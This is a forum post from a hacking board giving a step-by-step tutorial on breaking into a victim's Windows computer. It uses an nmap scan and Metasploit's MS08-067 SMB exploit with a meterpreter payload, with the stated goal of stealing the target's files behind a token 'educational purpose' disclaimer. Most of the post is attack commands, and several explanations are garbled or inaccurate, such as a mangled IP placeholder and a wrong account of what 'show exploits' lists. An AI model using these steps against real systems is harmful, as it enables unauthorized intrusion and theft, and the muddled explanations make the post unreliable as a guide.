.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 How to hack a computer remotely using metasploit

Go down 
PengirimMessage
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

How to hack a computer remotely using metasploit Empty
PostSubyek: How to hack a computer remotely using metasploit   How to hack a computer remotely using metasploit Icon_minitimeFri Feb 08, 2013 6:36 pm

remember, this is only for educational purpose and hence damaging any victim’s computer is at your own risk.

Note: The hacker can be traceable and hence additional techniques are required to make yourself safe!

So here goes the requirements and the procedure to hack into a PC.

Requirements:
Metasploit
Nmap
Debian Linux OS
IP of the victim’s computer.

Introduction to attack:

Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type netstat -ano and hit enter, you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.

Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at [You must be registered and logged in to see this link.]

We use Linux because it is the best OS for hackers. And you must know to use terminal on Linux, since we perform this attack on command lines.

Procedure:

Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command.

nmap -sS -O

In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.

Step 2: Now we have to open Metasploit (via terminal) and run it.

Type the following command to get the exploits in the victim’s computer.

show exploits

You will get a list of exploits in the victim’s computer. which looks similar to ms05_039_pnp. Every such exploit correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a command as shown below.

use windows/smb/ms08_067_netapi

Step 3: Now we use RHOST command to set the target ip.

set RHOST

And RPORT command to access port 445

set RPORT 445

Step 4: And now we give a command as

set SMBPIPE SRVSVC

And then,

set TARGET 0

Step 5: Now we got to set the payload hence the following command.

set PAYLOAD windows/meterpreter/bind_tcp

Step 6: Time for the BIG BANG…! Type exploit and hit enter.

If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have successfully hacked into the computer.

Now by using different commands we can steal the files on that system!

note: we are not responsible for all that you do for a post here, because science is not here just to study for your own crimes that caused loss
Kembali Ke Atas Go down
http://cyberwild.p.ht/
 
How to hack a computer remotely using metasploit
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» metasploit basic command
» Simple Metasploit in Action
» Installasi Metasploit di Linux CentOS
» Metasploit The Penetration Tester's Guide
» Automated Persistent Backdoor on Metasploit Framework

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: BoarD Blackc0de :: International Room :: Hacking & Security (Int.)-
Navigasi: